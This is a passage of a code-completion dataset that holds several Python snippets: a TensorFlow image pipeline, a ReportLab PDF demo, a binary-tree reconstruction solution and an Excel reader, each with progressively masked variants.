'channels': tf.FixedLenFeature([], tf.int64),
}
)
image, label = features['image'], features['label']
height, width = features['height'], features['wigth']
channels = features['channels']
# 从原始图像数据解析出像素矩阵,并根据图像尺寸还原图像
decoded_image = tf.decode_raw(image, tf.uint8)
decoded_image.set_shape([height, width, channels])
# 定义神经网络输入层图片的大小。
image_size = 299
# preprocess_for_train为7.2.2小节中介绍的图像预处理程序
distorted_image = p182.preprocess_for_train(
decoded_image, image_size, image_size, None
)
# 将处理后的图像和标签数据通过tf.train.shuffle_batch整理成神经网络训练时
# 需要的batch
min_after_dequeque = 10000
batch_size = 100
capacity = min_after_dequeque + 3 * batch_size
image_batch, label_batch = tf.train.shuffle_batch(
[distorted_image, label], batch_size=batch_size,
capacity=capacity, min_after_dequeue=min_after_dequeque
)
# 定义神经网络的结构以及优化过程。image_batch可以作为输入提供给神经网络的输入层。
# label_batch则提供了输入batch中样例的正确答案
logit = inference(image_batch)
loss = calc_loss(logit, label_batch)
train_step = tf.train.GradientDescentOptimizer(learning_rate=learning_rate).minimize(loss)
# 声明会话并运行神经网络的优化过程
with tf.Session() as sess:
# 神经网络训练准备工作。这些工作包括变量初始化、线程启动
tf.initialize_all_variables().run()
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(sess=sess, coord=coord)
# 神经网络训练过程
for i in range(TRAINING_ROUNDS):
sess.run(train_step)
# 停止所有线程
coord.request_stop()
coord.join(threads)
|
flexible
|
{
"blob_id": "1685a2c49bea14e6fcaffb03634f6875f8fa1049",
"index": 3726,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ndecoded_image.set_shape([height, width, channels])\n<mask token>\nwith tf.Session() as sess:\n tf.initialize_all_variables().run()\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\n for i in range(TRAINING_ROUNDS):\n sess.run(train_step)\n coord.request_stop()\n coord.join(threads)\n",
"step-3": "<mask token>\nfiles = tf.train.match_filenames_once(\n '/home/shenxj/tf-work/datasets/file_pattern-*')\nfilename_queue = tf.train.string_input_producer(files, shuffle=False)\nreader = tf.TFRecordReader()\n_, serialized_example = reader.read(filename_queue)\nfeatures = tf.parse_single_example(serialized_example, features={'image':\n tf.FixedLenFeature([], tf.string), 'label': tf.FixedLenFeature([], tf.\n int64), 'height': tf.FixedLenFeature([], tf.int64), 'weigth': tf.\n FixedLenFeature([], tf.int64), 'channels': tf.FixedLenFeature([], tf.\n int64)})\nimage, label = features['image'], features['label']\nheight, width = features['height'], features['wigth']\nchannels = features['channels']\ndecoded_image = tf.decode_raw(image, tf.uint8)\ndecoded_image.set_shape([height, width, channels])\nimage_size = 299\ndistorted_image = p182.preprocess_for_train(decoded_image, image_size,\n image_size, None)\nmin_after_dequeque = 10000\nbatch_size = 100\ncapacity = min_after_dequeque + 3 * batch_size\nimage_batch, label_batch = tf.train.shuffle_batch([distorted_image, label],\n batch_size=batch_size, capacity=capacity, min_after_dequeue=\n min_after_dequeque)\nlogit = inference(image_batch)\nloss = calc_loss(logit, label_batch)\ntrain_step = tf.train.GradientDescentOptimizer(learning_rate=learning_rate\n ).minimize(loss)\nwith tf.Session() as sess:\n tf.initialize_all_variables().run()\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\n for i in range(TRAINING_ROUNDS):\n sess.run(train_step)\n coord.request_stop()\n coord.join(threads)\n",
"step-4": "import tensorflow as tf\nimport p182.py as p182\nfiles = tf.train.match_filenames_once(\n '/home/shenxj/tf-work/datasets/file_pattern-*')\nfilename_queue = tf.train.string_input_producer(files, shuffle=False)\nreader = tf.TFRecordReader()\n_, serialized_example = reader.read(filename_queue)\nfeatures = tf.parse_single_example(serialized_example, features={'image':\n tf.FixedLenFeature([], tf.string), 'label': tf.FixedLenFeature([], tf.\n int64), 'height': tf.FixedLenFeature([], tf.int64), 'weigth': tf.\n FixedLenFeature([], tf.int64), 'channels': tf.FixedLenFeature([], tf.\n int64)})\nimage, label = features['image'], features['label']\nheight, width = features['height'], features['wigth']\nchannels = features['channels']\ndecoded_image = tf.decode_raw(image, tf.uint8)\ndecoded_image.set_shape([height, width, channels])\nimage_size = 299\ndistorted_image = p182.preprocess_for_train(decoded_image, image_size,\n image_size, None)\nmin_after_dequeque = 10000\nbatch_size = 100\ncapacity = min_after_dequeque + 3 * batch_size\nimage_batch, label_batch = tf.train.shuffle_batch([distorted_image, label],\n batch_size=batch_size, capacity=capacity, min_after_dequeue=\n min_after_dequeque)\nlogit = inference(image_batch)\nloss = calc_loss(logit, label_batch)\ntrain_step = tf.train.GradientDescentOptimizer(learning_rate=learning_rate\n ).minimize(loss)\nwith tf.Session() as sess:\n tf.initialize_all_variables().run()\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\n for i in range(TRAINING_ROUNDS):\n sess.run(train_step)\n coord.request_stop()\n coord.join(threads)\n",
"step-5": "# encoding:utf-8\nimport tensorflow as tf\nimport p182.py as p182\n# 创建文件列表,并通过文件列表创建输入文件队列。在调用输入数据处理流程前,需要\n# 统一所有原始数据的格式并将它们存储到TFRcord文件中。下面给出的文件列表应该包含所\n# 有提供训练数据的TFRcord文件\nfiles = tf.train.match_filenames_once(\"/home/shenxj/tf-work/datasets/file_pattern-*\")\nfilename_queue = tf.train.string_input_producer(files, shuffle=False)\n\n# 使用类似7.1节中结婚嫂的方法解析TFRecord文件里的数据。这里假设image中存储的是图像\n# 的原始数据,label为该样例所对应的标签。height,width和channels给出了图像的维度。\nreader = tf.TFRecordReader()\n_, serialized_example = reader.read(filename_queue)\nfeatures = tf.parse_single_example(\n serialized_example,\n features={\n 'image': tf.FixedLenFeature([], tf.string),\n 'label': tf.FixedLenFeature([], tf.int64),\n 'height': tf.FixedLenFeature([], tf.int64),\n 'weigth': tf.FixedLenFeature([], tf.int64),\n 'channels': tf.FixedLenFeature([], tf.int64),\n }\n)\nimage, label = features['image'], features['label']\nheight, width = features['height'], features['wigth']\nchannels = features['channels']\n\n# 从原始图像数据解析出像素矩阵,并根据图像尺寸还原图像\ndecoded_image = tf.decode_raw(image, tf.uint8)\ndecoded_image.set_shape([height, width, channels])\n# 定义神经网络输入层图片的大小。\nimage_size = 299\n# preprocess_for_train为7.2.2小节中介绍的图像预处理程序\ndistorted_image = p182.preprocess_for_train(\n decoded_image, image_size, image_size, None\n)\n\n# 将处理后的图像和标签数据通过tf.train.shuffle_batch整理成神经网络训练时\n# 需要的batch\nmin_after_dequeque = 10000\nbatch_size = 100\ncapacity = min_after_dequeque + 3 * batch_size\nimage_batch, label_batch = tf.train.shuffle_batch(\n [distorted_image, label], batch_size=batch_size,\n capacity=capacity, min_after_dequeue=min_after_dequeque\n)\n\n# 定义神经网络的结构以及优化过程。image_batch可以作为输入提供给神经网络的输入层。\n# label_batch则提供了输入batch中样例的正确答案\nlogit = inference(image_batch)\nloss = calc_loss(logit, label_batch)\ntrain_step = tf.train.GradientDescentOptimizer(learning_rate=learning_rate).minimize(loss)\n\n# 声明会话并运行神经网络的优化过程\nwith tf.Session() as sess:\n # 神经网络训练准备工作。这些工作包括变量初始化、线程启动\n tf.initialize_all_variables().run()\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\n\n # 神经网络训练过程\n for i in range(TRAINING_ROUNDS):\n sess.run(train_step)\n\n # 停止所有线程\n coord.request_stop()\n coord.join(threads)\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
c.translate(inch, inch)
c.setFont('Helvetica', 80)
c.setStrokeColorRGB(0.2, 0.5, 0.3)
c.setFillColorRGB(1, 0, 1)
c.rect(inch, inch, 6 * inch, 9 * inch, fill=1)
c.rotate(90)
c.setFillColorRGB(0, 0, 0.77)
c.drawString(6 * inch, -6 * inch, 'welcome my project pharmacie')
c.showPage()
c.save()
<|reserved_special_token_1|>
__version__ = '3.3.0'
__doc__ = """
The Canvas object is the primary interface for creating PDF files. See
doc/reportlab-userguide.pdf for copious examples.
"""
__all__ = ['Canvas']
ENABLE_TRACKING = 1
<|reserved_special_token_0|>
c = canvas.Canvas('essai.pdf')
<|reserved_special_token_0|>
c.translate(inch, inch)
c.setFont('Helvetica', 80)
c.setStrokeColorRGB(0.2, 0.5, 0.3)
c.setFillColorRGB(1, 0, 1)
c.rect(inch, inch, 6 * inch, 9 * inch, fill=1)
c.rotate(90)
c.setFillColorRGB(0, 0, 0.77)
c.drawString(6 * inch, -6 * inch, 'welcome my project pharmacie')
c.showPage()
c.save()
<|reserved_special_token_1|>
__version__ = '3.3.0'
__doc__ = """
The Canvas object is the primary interface for creating PDF files. See
doc/reportlab-userguide.pdf for copious examples.
"""
__all__ = ['Canvas']
ENABLE_TRACKING = 1
import os
import sys
import re
import hashlib
from string import digits
import tempfile
from math import sin, cos, tan, pi, ceil
from reportlab import rl_config, ascii, xrange
from reportlab.pdfbase import pdfutils
from reportlab.pdfbase import pdfdoc
from reportlab.pdfbase import pdfmetrics
from reportlab.pdfgen import pdfgeom, pathobject
from reportlab.pdfgen.textobject import PDFTextObject, _PDFColorSetter
from reportlab.lib.colors import black, _chooseEnforceColorSpace, Color, CMYKColor, toColor
from reportlab.lib.utils import import_zlib, ImageReader, isSeq, isStr, isUnicode, _digester
from reportlab.lib.rl_accel import fp_str, escapePDF
from reportlab.lib.boxstuff import aspectRatioFix
from reportlab.pdfgen import canvas
c = canvas.Canvas('essai.pdf')
from reportlab.lib.units import inch
c.translate(inch, inch)
c.setFont('Helvetica', 80)
c.setStrokeColorRGB(0.2, 0.5, 0.3)
c.setFillColorRGB(1, 0, 1)
c.rect(inch, inch, 6 * inch, 9 * inch, fill=1)
c.rotate(90)
c.setFillColorRGB(0, 0, 0.77)
c.drawString(6 * inch, -6 * inch, 'welcome my project pharmacie')
c.showPage()
c.save()
<|reserved_special_token_1|>
#Copyright ReportLab Europe Ltd. 2000-2017
#see license.txt for license details
__version__='3.3.0'
__doc__="""
The Canvas object is the primary interface for creating PDF files. See
doc/reportlab-userguide.pdf for copious examples.
"""
__all__ = ['Canvas']
ENABLE_TRACKING = 1 # turn this off to do profile testing w/o tracking
import os
import sys
import re
import hashlib
from string import digits
import tempfile
from math import sin, cos, tan, pi, ceil
from reportlab import rl_config, ascii, xrange
from reportlab.pdfbase import pdfutils
from reportlab.pdfbase import pdfdoc
from reportlab.pdfbase import pdfmetrics
from reportlab.pdfgen import pdfgeom, pathobject
from reportlab.pdfgen.textobject import PDFTextObject, _PDFColorSetter
from reportlab.lib.colors import black, _chooseEnforceColorSpace, Color, CMYKColor, toColor
from reportlab.lib.utils import import_zlib, ImageReader, isSeq, isStr, isUnicode, _digester
from reportlab.lib.rl_accel import fp_str, escapePDF
from reportlab.lib.boxstuff import aspectRatioFix
from reportlab.pdfgen import canvas
c = canvas.Canvas("essai.pdf")
from reportlab.lib.units import inch
# move the origin up and to the left
c.translate(inch, inch)
# define a large font
c.setFont("Helvetica", 80)
# choose some colors
c.setStrokeColorRGB(0.2, 0.5, 0.3)
c.setFillColorRGB(1, 0, 1)
# draw a rectangle
c.rect(inch, inch, 6 * inch, 9 * inch, fill=1)
# make text go straight up
c.rotate(90)
# change color
c.setFillColorRGB(0, 0, 0.77)
# say hello (note after rotate the y coord needs to be negative!)
c.drawString(6 * inch, -6 * inch, "welcome my project pharmacie")
c.showPage()
c.save()
|
flexible
|
{
"blob_id": "7d6e8e6142184a1540daa29dac802fe75bd93d8e",
"index": 4428,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nc.translate(inch, inch)\nc.setFont('Helvetica', 80)\nc.setStrokeColorRGB(0.2, 0.5, 0.3)\nc.setFillColorRGB(1, 0, 1)\nc.rect(inch, inch, 6 * inch, 9 * inch, fill=1)\nc.rotate(90)\nc.setFillColorRGB(0, 0, 0.77)\nc.drawString(6 * inch, -6 * inch, 'welcome my project pharmacie')\nc.showPage()\nc.save()\n",
"step-3": "__version__ = '3.3.0'\n__doc__ = \"\"\"\nThe Canvas object is the primary interface for creating PDF files. See\ndoc/reportlab-userguide.pdf for copious examples.\n\"\"\"\n__all__ = ['Canvas']\nENABLE_TRACKING = 1\n<mask token>\nc = canvas.Canvas('essai.pdf')\n<mask token>\nc.translate(inch, inch)\nc.setFont('Helvetica', 80)\nc.setStrokeColorRGB(0.2, 0.5, 0.3)\nc.setFillColorRGB(1, 0, 1)\nc.rect(inch, inch, 6 * inch, 9 * inch, fill=1)\nc.rotate(90)\nc.setFillColorRGB(0, 0, 0.77)\nc.drawString(6 * inch, -6 * inch, 'welcome my project pharmacie')\nc.showPage()\nc.save()\n",
"step-4": "__version__ = '3.3.0'\n__doc__ = \"\"\"\nThe Canvas object is the primary interface for creating PDF files. See\ndoc/reportlab-userguide.pdf for copious examples.\n\"\"\"\n__all__ = ['Canvas']\nENABLE_TRACKING = 1\nimport os\nimport sys\nimport re\nimport hashlib\nfrom string import digits\nimport tempfile\nfrom math import sin, cos, tan, pi, ceil\nfrom reportlab import rl_config, ascii, xrange\nfrom reportlab.pdfbase import pdfutils\nfrom reportlab.pdfbase import pdfdoc\nfrom reportlab.pdfbase import pdfmetrics\nfrom reportlab.pdfgen import pdfgeom, pathobject\nfrom reportlab.pdfgen.textobject import PDFTextObject, _PDFColorSetter\nfrom reportlab.lib.colors import black, _chooseEnforceColorSpace, Color, CMYKColor, toColor\nfrom reportlab.lib.utils import import_zlib, ImageReader, isSeq, isStr, isUnicode, _digester\nfrom reportlab.lib.rl_accel import fp_str, escapePDF\nfrom reportlab.lib.boxstuff import aspectRatioFix\nfrom reportlab.pdfgen import canvas\nc = canvas.Canvas('essai.pdf')\nfrom reportlab.lib.units import inch\nc.translate(inch, inch)\nc.setFont('Helvetica', 80)\nc.setStrokeColorRGB(0.2, 0.5, 0.3)\nc.setFillColorRGB(1, 0, 1)\nc.rect(inch, inch, 6 * inch, 9 * inch, fill=1)\nc.rotate(90)\nc.setFillColorRGB(0, 0, 0.77)\nc.drawString(6 * inch, -6 * inch, 'welcome my project pharmacie')\nc.showPage()\nc.save()\n",
"step-5": "\n#Copyright ReportLab Europe Ltd. 2000-2017\n#see license.txt for license details\n__version__='3.3.0'\n__doc__=\"\"\"\nThe Canvas object is the primary interface for creating PDF files. See\ndoc/reportlab-userguide.pdf for copious examples.\n\"\"\"\n\n__all__ = ['Canvas']\nENABLE_TRACKING = 1 # turn this off to do profile testing w/o tracking\n\nimport os\nimport sys\nimport re\nimport hashlib\nfrom string import digits\nimport tempfile\nfrom math import sin, cos, tan, pi, ceil\nfrom reportlab import rl_config, ascii, xrange\nfrom reportlab.pdfbase import pdfutils\nfrom reportlab.pdfbase import pdfdoc\nfrom reportlab.pdfbase import pdfmetrics\nfrom reportlab.pdfgen import pdfgeom, pathobject\nfrom reportlab.pdfgen.textobject import PDFTextObject, _PDFColorSetter\nfrom reportlab.lib.colors import black, _chooseEnforceColorSpace, Color, CMYKColor, toColor\nfrom reportlab.lib.utils import import_zlib, ImageReader, isSeq, isStr, isUnicode, _digester\nfrom reportlab.lib.rl_accel import fp_str, escapePDF\nfrom reportlab.lib.boxstuff import aspectRatioFix\n\nfrom reportlab.pdfgen import canvas\n\nc = canvas.Canvas(\"essai.pdf\")\nfrom reportlab.lib.units import inch\n\n# move the origin up and to the left\nc.translate(inch, inch)\n# define a large font\nc.setFont(\"Helvetica\", 80)\n# choose some colors\nc.setStrokeColorRGB(0.2, 0.5, 0.3)\nc.setFillColorRGB(1, 0, 1)\n# draw a rectangle\nc.rect(inch, inch, 6 * inch, 9 * inch, fill=1)\n# make text go straight up\nc.rotate(90)\n# change color\nc.setFillColorRGB(0, 0, 0.77)\n# say hello (note after rotate the y coord needs to be negative!)\nc.drawString(6 * inch, -6 * inch, \"welcome my project pharmacie\")\nc.showPage()\nc.save()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution(object):
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution(object):
def buildTree(self, inorder, postorder):
"""
:type inorder: List[int]
:type postorder: List[int]
:rtype: TreeNode
"""
hashmap = {}
for i, val in enumerate(inorder):
hashmap[val] = i
global post_index
post_index = len(inorder) - 1
def helper(left_index, right_index):
if left_index >= right_index:
return None
global post_index
root_val = postorder[post_index]
root = TreeNode(root_val)
post_index -= 1
index = hashmap[root_val]
root.right = helper(index + 1, right_index)
root.left = helper(left_index, index)
return root
return helper(0, len(inorder))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
global post_index
class Solution(object):
def buildTree(self, inorder, postorder):
"""
:type inorder: List[int]
:type postorder: List[int]
:rtype: TreeNode
"""
hashmap = {}
for i, val in enumerate(inorder):
hashmap[val] = i
global post_index
post_index = len(inorder) - 1
def helper(left_index, right_index):
if left_index >= right_index:
return None
global post_index
root_val = postorder[post_index]
root = TreeNode(root_val)
post_index -= 1
index = hashmap[root_val]
root.right = helper(index + 1, right_index)
root.left = helper(left_index, index)
return root
return helper(0, len(inorder))
<|reserved_special_token_1|>
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Copyright 2020, Yutong Xie, UIUC.
Using recursion to construct binary tree from postorder and inorder traversal
'''
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
global post_index
class Solution(object):
def buildTree(self, inorder, postorder):
"""
:type inorder: List[int]
:type postorder: List[int]
:rtype: TreeNode
"""
hashmap = {}
for i, val in enumerate(inorder):
hashmap[val] = i
global post_index
post_index = len(inorder)-1
def helper(left_index, right_index):
if left_index >= right_index:
return None
global post_index
root_val = postorder[post_index]
root = TreeNode(root_val)
post_index -= 1
index = hashmap[root_val]
root.right = helper(index+1, right_index)
root.left = helper(left_index, index)
return root
return helper(0, len(inorder))
|
flexible
|
{
"blob_id": "b59dfd97a2b52ddef4e37557ea96bff9edf34989",
"index": 1342,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution(object):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Solution(object):\n\n def buildTree(self, inorder, postorder):\n \"\"\"\n :type inorder: List[int]\n :type postorder: List[int]\n :rtype: TreeNode\n \"\"\"\n hashmap = {}\n for i, val in enumerate(inorder):\n hashmap[val] = i\n global post_index\n post_index = len(inorder) - 1\n\n def helper(left_index, right_index):\n if left_index >= right_index:\n return None\n global post_index\n root_val = postorder[post_index]\n root = TreeNode(root_val)\n post_index -= 1\n index = hashmap[root_val]\n root.right = helper(index + 1, right_index)\n root.left = helper(left_index, index)\n return root\n return helper(0, len(inorder))\n",
"step-4": "<mask token>\nglobal post_index\n\n\nclass Solution(object):\n\n def buildTree(self, inorder, postorder):\n \"\"\"\n :type inorder: List[int]\n :type postorder: List[int]\n :rtype: TreeNode\n \"\"\"\n hashmap = {}\n for i, val in enumerate(inorder):\n hashmap[val] = i\n global post_index\n post_index = len(inorder) - 1\n\n def helper(left_index, right_index):\n if left_index >= right_index:\n return None\n global post_index\n root_val = postorder[post_index]\n root = TreeNode(root_val)\n post_index -= 1\n index = hashmap[root_val]\n root.right = helper(index + 1, right_index)\n root.left = helper(left_index, index)\n return root\n return helper(0, len(inorder))\n",
"step-5": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\n Copyright 2020, Yutong Xie, UIUC.\n Using recursion to construct binary tree from postorder and inorder traversal\n '''\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nglobal post_index\n\nclass Solution(object):\n def buildTree(self, inorder, postorder):\n \"\"\"\n :type inorder: List[int]\n :type postorder: List[int]\n :rtype: TreeNode\n \"\"\"\n hashmap = {}\n for i, val in enumerate(inorder):\n hashmap[val] = i\n\n global post_index\n post_index = len(inorder)-1\n\n def helper(left_index, right_index):\n if left_index >= right_index:\n return None\n\n global post_index\n\n root_val = postorder[post_index]\n root = TreeNode(root_val)\n\n post_index -= 1\n\n index = hashmap[root_val]\n\n root.right = helper(index+1, right_index)\n root.left = helper(left_index, index)\n\n return root\n\n return helper(0, len(inorder))\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# -*- coding: utf-8 -*-
"""
Created on Mon Apr 16 21:26:03 2018
@author: Brandon
"""os.getcwd()
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
NameError: name 'os' is not definimport os
>>> os.getcwd()
'C:\\Users\\Brandon\\AppData\\Local\\Programs\\Python\\Python36-32'
>>> os.chdir()
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: Required argument 'path' (pos 1) not found
>>> os.chdir()
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: Required argument 'path' (pos 1) not found
>>>
>>> os.chdir("C:\\Users\\Brandon\Documents")
>>> os.getcwd()
'C:\\Users\\Brandon\\Documents'
>>> os.makedirs()
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: makedirs() missing 1 required positional argument: 'name'
>>> os.makedirs("yu")
>>> os.chdir("\\yu")
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
FileNotFoundError: [WinError 2] The system cannot find the file specified: '\\yu'
>>> os.chdir(".\\yu")
>>> os.getcwd()
'C:\\Users\\Brandon\\Documents\\yu'
>>> os.path.getsize(yu)
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
NameError: name 'yu' is not defined
>>> os.path.getsize()
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: getsize() missing 1 required positional argument: 'filename'
>>> os.path.getsize()
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: getsize() missing 1 required positional argument: 'filename'
>>> os.path.exists()
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: exists() missing 1 required positional argument: 'path'
>>> os.path.exits("C:\\Users\\Brandon\\Documents\\yu")
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
AttributeError: module 'ntpath' has no attribute 'exits'
>>> os.path.exists("C:\\Users\\Brandon\\Documents\\yu")
True
>>>
|
normal
|
{
"blob_id": "dc97703d39e7db29e0ba333c2797f4be6d015fd7",
"index": 7886,
"step-1": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 16 21:26:03 2018\n\n@author: Brandon\n\"\"\"os.getcwd()\nTraceback (most recent call last):\n File \"<stdin>\", line 1, in <module>\nNameError: name 'os' is not definimport os\n>>> os.getcwd()\n'C:\\\\Users\\\\Brandon\\\\AppData\\\\Local\\\\Programs\\\\Python\\\\Python36-32'\n>>> os.chdir()\nTraceback (most recent call last):\n File \"<stdin>\", line 1, in <module>\nTypeError: Required argument 'path' (pos 1) not found\n>>> os.chdir()\nTraceback (most recent call last):\n File \"<stdin>\", line 1, in <module>\nTypeError: Required argument 'path' (pos 1) not found\n>>>\n>>> os.chdir(\"C:\\\\Users\\\\Brandon\\Documents\")\n>>> os.getcwd()\n'C:\\\\Users\\\\Brandon\\\\Documents'\n>>> os.makedirs()\nTraceback (most recent call last):\n File \"<stdin>\", line 1, in <module>\nTypeError: makedirs() missing 1 required positional argument: 'name'\n>>> os.makedirs(\"yu\")\n>>> os.chdir(\"\\\\yu\")\nTraceback (most recent call last):\n File \"<stdin>\", line 1, in <module>\nFileNotFoundError: [WinError 2] The system cannot find the file specified: '\\\\yu'\n>>> os.chdir(\".\\\\yu\")\n>>> os.getcwd()\n'C:\\\\Users\\\\Brandon\\\\Documents\\\\yu'\n>>> os.path.getsize(yu)\nTraceback (most recent call last):\n File \"<stdin>\", line 1, in <module>\nNameError: name 'yu' is not defined\n>>> os.path.getsize()\nTraceback (most recent call last):\n File \"<stdin>\", line 1, in <module>\nTypeError: getsize() missing 1 required positional argument: 'filename'\n>>> os.path.getsize()\nTraceback (most recent call last):\n File \"<stdin>\", line 1, in <module>\nTypeError: getsize() missing 1 required positional argument: 'filename'\n>>> os.path.exists()\nTraceback (most recent call last):\n File \"<stdin>\", line 1, in <module>\nTypeError: exists() missing 1 required positional argument: 'path'\n>>> os.path.exits(\"C:\\\\Users\\\\Brandon\\\\Documents\\\\yu\")\nTraceback (most recent call last):\n File \"<stdin>\", line 1, in <module>\nAttributeError: module 'ntpath' has no attribute 'exits'\n>>> os.path.exists(\"C:\\\\Users\\\\Brandon\\\\Documents\\\\yu\")\nTrue\n>>>\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def excel_table_byindex(file='D:\\基金公司\\数据库-制表符\\资产组合-基金公司维度.xlsx',
colnameindex=0, by_index=0):
data = open_excel(file='D:\\基金公司\\数据库-制表符\\资产组合-基金公司维度.xlsx')
table = data.sheets()[by_index]
nrows = table.nrows
ncols = table.ncols
colnames = table.row_values(colnameindex)
list = []
for rownum in range(1, nrows):
row = table.row_values(rownum)
if row:
app = {}
for i in range(len(colnames)):
app[colnames[i]] = row[i]
list.apend(app)
return list
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def open_excel(file='D:\\基金公司\\数据库-制表符\\资产组合-基金公司维度.xlsx'):
try:
data = xlrd.open_workbook('D:\\基金公司\\数据库-制表符\\资产组合-基金公司维度.xlsx')
return data
except Exception as e:
print(str(e))
def excel_table_byindex(file='D:\\基金公司\\数据库-制表符\\资产组合-基金公司维度.xlsx',
colnameindex=0, by_index=0):
data = open_excel(file='D:\\基金公司\\数据库-制表符\\资产组合-基金公司维度.xlsx')
table = data.sheets()[by_index]
nrows = table.nrows
ncols = table.ncols
colnames = table.row_values(colnameindex)
list = []
for rownum in range(1, nrows):
row = table.row_values(rownum)
if row:
app = {}
for i in range(len(colnames)):
app[colnames[i]] = row[i]
list.apend(app)
return list
<|reserved_special_token_1|>
import xdrlib, sys
import xlrd
def open_excel(file='D:\\基金公司\\数据库-制表符\\资产组合-基金公司维度.xlsx'):
try:
data = xlrd.open_workbook('D:\\基金公司\\数据库-制表符\\资产组合-基金公司维度.xlsx')
return data
except Exception as e:
print(str(e))
def excel_table_byindex(file='D:\\基金公司\\数据库-制表符\\资产组合-基金公司维度.xlsx',
colnameindex=0, by_index=0):
data = open_excel(file='D:\\基金公司\\数据库-制表符\\资产组合-基金公司维度.xlsx')
table = data.sheets()[by_index]
nrows = table.nrows
ncols = table.ncols
colnames = table.row_values(colnameindex)
list = []
for rownum in range(1, nrows):
row = table.row_values(rownum)
if row:
app = {}
for i in range(len(colnames)):
app[colnames[i]] = row[i]
list.apend(app)
return list
<|reserved_special_token_1|>
import xdrlib,sys
import xlrd
def open_excel(file='D:\基金公司\数据库-制表符\资产组合-基金公司维度.xlsx'):
try:
data=xlrd.open_workbook('D:\基金公司\数据库-制表符\资产组合-基金公司维度.xlsx')
return data
except Exception as e:
print (str(e))
def excel_table_byindex(file='D:\基金公司\数据库-制表符\资产组合-基金公司维度.xlsx',colnameindex=0,by_index=0):
data=open_excel(file='D:\基金公司\数据库-制表符\资产组合-基金公司维度.xlsx')
table=data.sheets()[by_index]
nrows=table.nrows
ncols=table.ncols
colnames=table.row_values(colnameindex)
list=[]
for rownum in range(1,nrows):
row=table.row_values(rownum)
if row:
app={}
for i in range(len(colnames)):
app[colnames[i]]=row[i]
list.apend(app)
return list
|
flexible
|
{
"blob_id": "d211594a034489d36a5648bf0b926fbd734fd0df",
"index": 6928,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef excel_table_byindex(file='D:\\\\基金公司\\\\数据库-制表符\\\\资产组合-基金公司维度.xlsx',\n colnameindex=0, by_index=0):\n data = open_excel(file='D:\\\\基金公司\\\\数据库-制表符\\\\资产组合-基金公司维度.xlsx')\n table = data.sheets()[by_index]\n nrows = table.nrows\n ncols = table.ncols\n colnames = table.row_values(colnameindex)\n list = []\n for rownum in range(1, nrows):\n row = table.row_values(rownum)\n if row:\n app = {}\n for i in range(len(colnames)):\n app[colnames[i]] = row[i]\n list.apend(app)\n return list\n",
"step-3": "<mask token>\n\n\ndef open_excel(file='D:\\\\基金公司\\\\数据库-制表符\\\\资产组合-基金公司维度.xlsx'):\n try:\n data = xlrd.open_workbook('D:\\\\基金公司\\\\数据库-制表符\\\\资产组合-基金公司维度.xlsx')\n return data\n except Exception as e:\n print(str(e))\n\n\ndef excel_table_byindex(file='D:\\\\基金公司\\\\数据库-制表符\\\\资产组合-基金公司维度.xlsx',\n colnameindex=0, by_index=0):\n data = open_excel(file='D:\\\\基金公司\\\\数据库-制表符\\\\资产组合-基金公司维度.xlsx')\n table = data.sheets()[by_index]\n nrows = table.nrows\n ncols = table.ncols\n colnames = table.row_values(colnameindex)\n list = []\n for rownum in range(1, nrows):\n row = table.row_values(rownum)\n if row:\n app = {}\n for i in range(len(colnames)):\n app[colnames[i]] = row[i]\n list.apend(app)\n return list\n",
